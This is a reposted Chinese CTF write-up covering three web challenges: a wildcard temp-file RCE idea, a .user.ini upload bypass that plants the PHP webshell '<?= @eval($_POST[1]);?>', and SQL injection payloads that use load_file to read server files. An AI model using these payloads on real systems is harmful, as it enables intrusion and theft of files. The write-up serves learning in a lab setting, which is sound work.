0X03

news2024/11/26 22:28:34

红包题第二弹

看到源码里面的提示

7216322e08f04ad2adc874d7ce8f88f2.png

 ?cmd=phpinfo();

 看到源码

de0ed5edfa3c47a5a16a3d398eb55591.png

 kk

关键点就是有两个正则表达式

第一个

preg_match("/[A-Za-oq-z0-9$]+/",$cmd)

第二个

preg_match("/\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\{|\}|\[|\]|\'|\"|\:|\,/",$cmd)

从第一个发现小写字母p没有被过滤掉,同时也是做了许多的过滤

是无字母数字RCE,并且不能用取反,异或,自增去绕过

因为过滤了~^,异或和取反都不用考虑了

其他师傅的做法

利用上传的临时文件去命令执行getshell

基本思路就是上传?,然后利用eval($cmd)去执行它。既然知道临时文件夹下的命名规则,也没有过滤通配符?,构造./??p/p?p??????就能读到这个文件。

点就相当于source

用来执行文件。source /home/user/bash 等同于 . /home/user/bash

问号?代表一个任意字符,通配符/??p/p?p??????匹配/tmp/phpxxxxxx

临时文件目录

php上传文件后会将文件存储在临时文件夹,然后用move_uploaded_file()
函数将上传的文件移动到新位置。临时文件夹可通过php.ini的upload_tmp_dir 指定,默认是/tmp目录。

规则

默认为 php+4或者6位随机数字和大小写字母,在windows下有tmp后缀,linux没有。比如windows下:phpXXXXXX.tmp
linux下:phpXXXXXX。

后面的就有点整不懂了

先放一放

web13

文件上传的窗口

先上传php文件看,出现报错

22f70b24af0e4fafb62d0ea9749bc6b8.png

访问upload.php

42540e0fb8934be397b9d0ab965044ef.png

是不是备份文件,这个备份文件是系统自己产生的

加上.bak,

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

 拓展名只能读取一个,且不能为php,文件的大小要小于24字节,不能有php

先传入.user.ini,进行写入

auto_prepend_file=1.txt

 也就是后面传入的文件会以php的形式打开

传入1.txt

<?= @eval($_POST[1]);?>

 5037331b3c5c491982d28e34ead4e1a0.png

连接显示返回数据为空

c1fdf95c1a1c417dbf9fdb69954ece1c.png

 

 j检查一下,是已经上传成功的

c982f834fbf543fb9b6cfd79b87a720c.png

 glob() 函数返回匹配指定模式的文件名或目录

用函数看看目录下有什么文件

?a=print_r(scandir('.'));

 或者

/?a=print_r(glob("*"));

 59077fde00b944b5a11ab3f45cd4bdca.png

 尝试读取

?a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

 获取flag

web14

源代码直接显示

 <?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__); 

 先可以尝试一下get

当我们输入c=3

ca2aea1f758a43348adafacf3e3f7752.png

刚开始的时候没有觉得什么奇怪的,后来想会不会是后面的文件路径

加上试一下

036d30afbabc4e2bb6c5d65a9bf0cf08.png

 4c85b5df1fd645b486855b287113922b.png

 看到新的登录框

在尝试一下admin的时候,发现URL里面出现一个新的参数query=admin

query=1和2还有3有回显加上字符就没有了,应该就是数字型注入了,并且过滤掉空格

刚刚里面出现过一文件secret.php

在index.php中包含了一个secret.php,先读这个文件试试

load_file函数可以轻松读取本地文件的全部或部分内容

eg:load_file('/home/user/test.txt');

?query=-1/**/union/**/select/**/load_file("/var/www/html/secret.php")#

 54ca573e919149bbba7cf02ef2880cca.png

 可以看到flag实际上是在:/real_flag_is_here,所以读这个文件

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

073848f07af9484088235f273653642a.png

 

 

 

 

 

 

 

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1182545.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【MySQL日志与备份篇】其他数据库日志

其他数据库日志 文章目录 其他数据库日志1. 概述1.1 日志类型1.2 日志的弊端 2. 慢查询日志(slow query log)3. 通用查询日志(general query log)4. 错误日志(error log)5. 二进制日志(bin log)5.1 参数5.2 查看日志5.3 格式5.3.1 STATEMENT模式 &#xff08;基于SQL语句的复制…

Web组件

开发者使用Vue、React等框架来使用及创建定制的组件&#xff0c;Web组件是浏览器原生支持的替代这些框架的特性&#xff0c;主要涉及相对比较新的三个Web标准。这些Web标准允许JS使用新标签扩展HTML&#xff0c;扩展后的标签就是自成一体的、可重用的UI组件。 1 HTML模版 Docu…

数据结构大体体系

逻辑结构 线性结构线性表一串珠子用线连起来&#xff0c;这就是典型的“线性存储结构”。每颗珠子之间的关系结构也很简单&#xff0c;包括头尾的话&#xff0c;它们最少有一个关系对象&#xff0c;而中间的珠子无论前后都只有一个关系对象&#xff0c;即 one-to-one栈队列字符…

webgoat-Sensitive Data Exposure 敏感信息泄露

insecure login不安全的登录 Encryption is a very important tool for secure communication 0x02 点击login&#xff0c;可以看到payload里的username和password&#xff0c;输入后点击submit即可。 这题的目的是说明&#xff0c;信息传输过程中需要加密&#xff0c;如不…

【C语言 | 符号】C语言中符号易出错的地方

&#x1f601;博客主页&#x1f601;&#xff1a;&#x1f680;https://blog.csdn.net/wkd_007&#x1f680; &#x1f911;博客内容&#x1f911;&#xff1a;&#x1f36d;嵌入式开发、Linux、C语言、C、数据结构、音视频&#x1f36d; &#x1f923;本文内容&#x1f923;&a…

一次简单的测试

文章现写的&#xff0c;部分内容有些着急 0x01 测试过程 开局登录框&#xff0c;没有测试SQL注入与XSS(菜鸟&#xff0c;测也测不出来。) 有system用户&#xff0c;尝试弱口令&#xff0c;无果&#xff01; 直接namp来一下子端口探测吧 发现有3306与8888 3306 mysql测试 88…

python 之异常处理结构

文章目录 常见的异常处理表现形式1. SyntaxError2. NameError3. TypeError4. IndexError5. KeyError6. ZeroDivisionError7. FileNotFoundErrortry……except …… 结构1. try 块2. except 块示例&#xff1a;多个except块try……except ……else 结构结构说明&#xff1a;示例…

注册电气工程师(供配电)专业考试大纲纯干货分享

1.法律法规与工程管理 1.1熟悉我国工程勘察设计中必须执行法律、法规的基本要求&#xff1b; 1.2熟悉了解工程勘察设计中必须执行建设标准强制性条文的概念&#xff1b; 1.3了解我国工程项目管理的基本概念和项目建设法人、项目经理、项目招标与投标、项目承包与分包等基本要素…

MySQL 数据目录和 InnoDB 表空间补充知识:详细结构

1. 数据目录 在Ubuntu下&#xff0c;MySQL的数据目录为/var/lib/mysql 1.1 数据库在文件系统中的表示 &#xff08;1&#xff09;创建数据库时&#xff0c;会在数据目录下创建一个与数据库名同名的子目录。&#xff08;除了information_schema这个系统数据外&#xff09; &…

AVS3:双向梯度修正BGC

双向梯度修正&#xff08;Bi-directional Gradient Correction&#xff0c;BGC&#xff09;是利用双向参考块间的差值对预测值进行修正的技术。 BGC仅用于双向预测CU&#xff0c;设两个方向得到的单向预测值分别为pred0和pred1&#xff0c;修正前的双向预测值为predBI&#xf…

看完这篇,医学小白也能轻松玩转文献查阅

对医学生而言&#xff0c;文献查询是写论文必不可少的一环。然而这实在是一件重要但又心累的事情。你是否每次查找文献&#xff0c;都感觉自己在进行无意义的重复劳动&#xff1b;一天下来全在搜索、下载、保存&#xff1b;搜索引擎给出的结果太多太杂&#xff0c;或者找不到全…

linux C++实现线程绑定CPU

前言 嵌入式里面我们会使用到多核的cpu&#xff0c;随着产品芯片性能提升&#xff0c;我们也会有很多功能&#xff0c;以及很多进程产生运行&#xff0c;这个时候我们在任务调度调优的时候&#xff0c;把一些进程绑定到固定cpu运行&#xff0c;下面就来分享一下cpu绑定运行的过…

ubunt18.04.4 安装petalinux2022.2

安装Petalinux需要许多依赖&#xff1a; 安装下面的工具&#xff1a; sudo apt-get install net-tools sudo apt-get install xterm sudo apt-get install autoconf sudo apt-get install libtool sudo apt-get install texinfo sudo apt-get install zlib1g-dev sudo apt-get…

Android Studio报错:connect refused

参考链接&#xff1a; https://blog.csdn.net/qq_43213783/article/details/113936012 参考文章中说报错主要是由于代理导致的&#xff0c;在文件->设置->外观与行为->系统设置->HTTP代理。 方法一&#xff1a; 查看打开代理&#xff08;前提是代理可以通网&#x…

混沌系统在图像加密中的应用(小波混沌神经网络)

混沌系统在图像加密中的应用&#xff08;小波混沌神经网络&#xff09; 前言一、小波混沌神经网络模型二、拓展三、python代码 前言 小波混沌神经网络是一种神经网络模型&#xff0c;结合了小波变换和混沌理论&#xff0c;用于信号处理、分类和预测。该模型基于多层前向神经网…

经典OJ题:单链表相交

目录 题目&#xff1a; 链表相交&#x1f34c;的概念&#xff1a; 单链表相交&#x1f34c;主要的问题&#xff1a; 思路的分析&#x1f34c;&#xff1a; 问题的回答&#xff1a; 如何判断相交&#x1f34c;&#xff1a; 如何寻找交点&#x1f34c;&#xff1a; 代码演…

独立云厂商市场份额第一 | 云轴科技ZStack位居IDC云系统软件市场报告第一梯队

近日&#xff0c;全球IT市场研究和咨询公司IDC发布《中国云系统软件市场跟踪报告2023H1》报告&#xff0c;报告显示2023年上半年中国云系统软件整体市场规模达到24.08亿元&#xff0c;同比增长16.4%。其中&#xff0c;云轴科技ZStack 作为产品化的云基础软件提供商&#xff0c;…

Leetcode-206 反转链表

迭代法&#xff1a;将指针方向依次改变&#xff0c;定义两个指针pre和cur /*** Definition for singly-linked list.* public class ListNode {* int val;* ListNode next;* ListNode() {}* ListNode(int val) { this.val val; }* ListNode(int val, Lis…

如何找出最优的【SVC】核函数和参数值—以乳腺癌数据集为例

在实际的工作中&#xff0c;有的时候我们不知道数据特征&#xff0c;也不知道我们的数据是线性还是非线性。因此我们需要对数据一步步进行摸索&#xff0c;来找到最优的核函数和参数值。接下来我们以sklearn乳腺癌数据集为例。 先来导入相应的模块&#xff1a; from sklearn.d…

solidworks安装时,出现这个错误:无法获得下列许可SOLIDWORKS Standard.无效的(不一致的)使用许可号码。(-8,544,0)

问题描述&#xff1a;在安装SolidWorks2023时&#xff0c;按照软件管家中的步骤&#xff0c;但是在打开SolidWorks2023桌面上的快捷键时&#xff0c;出现了这个错误&#xff1a; 无法获得下列许可SOLIDWORKS Standard.无效的&#xff08;不一致的&#xff09;使用许可号码。(-…